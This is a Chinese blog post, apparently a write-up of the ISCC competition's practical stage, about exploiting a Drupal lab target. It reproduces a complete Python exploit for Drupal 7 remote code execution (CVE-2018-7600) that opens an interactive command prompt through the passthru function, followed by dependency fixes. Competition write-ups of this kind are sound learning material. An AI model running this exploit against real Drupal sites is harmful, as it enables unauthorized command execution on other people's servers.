ISCC--实战第一阶段(记Drupal漏洞利用)

已于 2023-05-26 08:16:39 修改
阅读量377 收藏
点赞数
分类专栏: 实战篇 文章标签: 前端
于 2023-05-19 23:29:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73767109/article/details/130775037
版权

 按要求下载VPN连接后

21179fe225d94bb6a64630b12cf393b4.png

发现是drupal

用linux搜索相关漏洞

4aa938878c374b5e8dc42f1d211b5272.png

 使用最常见的cve-2018-7600漏洞

在网上搜索该漏洞的poc

#!/usr/bin/env python3

import requests
from bs4 import BeautifulSoup

def pwn_target(target, function, command, proxy):
    requests.packages.urllib3.disable_warnings()
    proxies = {'http': proxy, 'https': proxy}
    #print('[*] Poisoning a form and including it in cache.')
    get_params = {'q': 'user/password', 'name[#post_render][]': function, 'name[#type]': 'markup', 'name[#markup]': command}
    post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name', '_triggering_element_value': '', 'opz': 'E-mail new Password'}
    r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
    soup = BeautifulSoup(r.text, "html.parser")
    try:
        form = soup.find('form', {'id': 'user-pass'})
        form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
        if form_build_id:
            #print('[*] Poisoned form ID: ' + form_build_id)
            #print('[*] Triggering exploit to execute: ' + command)
            get_params = {'q': 'file/ajax/name/#value/' + form_build_id}
            post_params = {'form_build_id': form_build_id}
            r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
            parsed_result = r.text.split('[{"command":"settings"')[0]
            print(parsed_result)
    except:
        print("ERROR: Something went wrong.")
        raise

def main():
    print()
    print('=============================================================================')
    print('|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |')
    print('|                              by xiugou                                    |')
    print('=============================================================================\n')

    function = "passthru"
    proxy = "socks5://127.0.0.1:1080"

    while True:
        target = "http://172.18.0.2"
        command = input("shell>> :")
        
        try:
            pwn_target(target.strip(), function.strip(), command.strip(), proxy.strip())
        except KeyboardInterrupt:
            print("Exit program.")
            break

if __name__ == '__main__':
    main()

把地址改成需要利用的地址

在终端尝试运行

28259aff6f1844ebbc37ed1b2e6ce965.png

 如果报错可以尝试进入python输入

pip install beautifulsoup4

 或者进入pycharm中(如果是用pycharm的话)

602d088e7c244d91b1d52179971d7f24.png 在里面搜索beautifulsoup4下载即可

43151935553b4c62acc0a8c17ed0ab2a.png

ac049304634049aba7538f93be7897e5.png

题目是要进程号

 输入ps -ef查看进程

6f6c0e3115714b5cb94da3fe34afe245.png

缺包

python3.9 -m pip install pysocks

再访问即可 

baea072c03f14c47b5a5fccfcb555057.png

 若无报错但长时间无法访问,重启VPN即可

 

Sharpery
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
drupal 7 ajax,【漏洞分析】CVE-2018-7600 Drupal 7.x 版本代码执行
weixin_35700003的博客
08-06 1265
阅读:8,003CVE-2018-7600影响范围包括了Drupal 6.x,7.x,8.x版本,前几天8.x版本的PoC出来之后大家都赶紧分析了一波,然后热度似乎慢慢退去了。两天前Drupalgeddon2项目更新了7.x版本的exp,实际环境也出现了利用,下面就简单来看一下0x01 概述CVE-2018-7600影响范围包括了Drupal 6.x,7.x,8.x版本,前几天8.x版本的PoC出...
iscc-cli:国际会议
05-09
iscc-cli-命令行工具 一个基于为数字媒体文件创建ISCC代码的命令行工具。目录背景国际标准内容规范是针对分散式内容标识的的提议。 ISCC代码是根据内容本身通过算法生成的,并提供了许多强大的功能,例如内容相似性...
Drupal远程代码执行漏洞(CVE-2018-7600)
ANOrange的博客
04-10 669
DrupalDrupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理。
drupal 执行.php文件,Drupal7.xPHP代码执行漏洞分析
weixin_35928736的博客
04-06 300
0×04 漏洞总结1.重新安装问题需要获得数据库的操作权(不一定是root),方可实现。如获得数据库管理员用户名和密码,且数据库设置为可以对外连接;或者程序某个地方存在注入漏洞。2.文件包含问题,需要有后台管理员权限,方可实现。可以结合其他漏洞,例如本篇文章中提到的重新安装问题。3.这两个问题的危害性和影响范围比较大,drupal在国内外都是比较流行的cms系统,用户很多,如果出现数据库连接...
探秘Drupal 7安全漏洞利用工具:深度剖析与应用实践
最新发布
gitblog_00043的博客
06-22 322
探秘Drupal 7安全漏洞利用工具:深度剖析与应用实践 项目地址:https://gitcode.com/pimps/CVE-2018-7600 在网络安全的暗潮中,漏洞是永远的话题。今天,我们将深入探讨一个专为Drupal 7设计的安全研究工具,该工具针对著名的CVE-2018-7600与CVE-2018-7602漏洞进行了精准打击。对于那些对Web安全充满好奇,或是负责网站维护、安全审计的专...
Drupal漏洞Drupal 7.31 SQL漏洞
2301_77778745的博客
04-25 555
1.通过python调用drupal7.x.py脚本对数据库进行注入。test test(后面两个test是新设的用户名和密码)2.输入命令:python drupal7.x.py。
Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)
What_Happened的博客
11-25 3265
2014年10月16日有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。        通过测试,我总结了一套完整的利用过程。       (1)利用google查找潜在的目标,关键字很多啦,比如:in
ISCC-2015-细节决定成败.rar
09-30
标题“ISCC-2015-细节决定成败.rar”暗示了这个压缩包可能包含的是一个关于2015年国际软件构造大会(ISCC)的资料集,其中的重点是讨论了在软件开发过程中细节的重要性。ISCC是一个专注于软件构造、编程方法、软件工程...
PyPI 官网下载 | iscc-cli-0.9.12.tar.gz
01-12
标题中的"PyPI 官网下载 | iscc-cli-0.9.12.tar.gz"表明这是一个从Python Package Index(PyPI)官方源下载的软件包,名为`iscc-cli`,版本为0.9.12,其打包格式是tar.gz。PyPI是Python社区最常用的第三方库分发平台...
PyPI 官网下载 | iscc-cli-0.8.2.tar.gz
02-01
标题中的"PyPI 官网下载 | iscc-cli-0.8.2.tar.gz"指出这是一个在Python Package Index (PyPI) 官网上可以找到的软件包,名为`iscc-cli`,版本号为0.8.2,其源代码以tar.gz格式提供。这个包可能是用于命令行界面的...
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件
10-23
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件 具体利用方法可以参见http://blog.csdn.net/kikaylee/article/details/40400643
ISCC-parasite
04-01
ISCC-parasite 是一个基于R语言的项目,专注于研究和分析寄生虫(parasite)相关的数据。该项目可能包含一系列工具和方法,用于处理、统计和可视化寄生虫生物学研究中的数据。R语言是一种广泛应用在统计计算和图形...
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)漏洞复现
ADummy的博客
02-23 857
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>信息被爆出 0x01漏洞介绍 ​ Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。 影响版本 Drupal < 7.31 0x02漏洞复现 payload: POST /?q=node&destinati
Drupal远程代码执行漏洞(CVE-2019-6339)
weixin_46411728的博客
08-25 2599
Drupal 远程代码执行漏洞(CVE-2019-6339)
漏洞复现-Drupal远程代码执行漏洞(CVE-2018-7602)
qq_45751902的博客
10-23 2041
的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介,从而导致该站点受到威胁。此漏洞Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。-c 后面接命令,紧随账号,密码。
Drupal远程代码执行漏洞(CVE-2018-7602)
weixin_46411728的博客
08-24 1410
CVE-2018-7602
[Vulnhub]Drupal7.3漏洞复现
qq_69209270的博客
10-07 268
cve-2014-3704主要判断是否有sql漏洞,后面操作全是靠kali中工具网站要学会利用kali中的工具,kali中工具很多,尤其是searchsploit工具,大部分cms漏洞都可以在上面找到。
Drupal 7.31 SQL注入漏洞利用详解及EXP
热门推荐
Exploit的小站~
05-10 2万+
 有意迟几天放出来这篇文章以及程序,不过看样子Drupal的这个洞没有引起多少重视,所以我也没有必要按着不发了,不过说实话这个洞威力挺大的,当然,这也是Drupal本身没有意料到的。 0x00 首先,这个漏洞真的很大,而且Drupal用的也比较多,应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp。不过,这个洞好像不怎么被重视,这也是极为不合适。...
ISCC where
09-08
ISCC中,有两种集群形式,一种是分散式集群,另一种是集中式集群。在分散式集群中,每个节点都有潜力成为簇头,而在集中式集群中,基站选择最佳的簇头。这里的"最佳"是通过一些规则来近似确定的。在存储的过程中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sharpery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值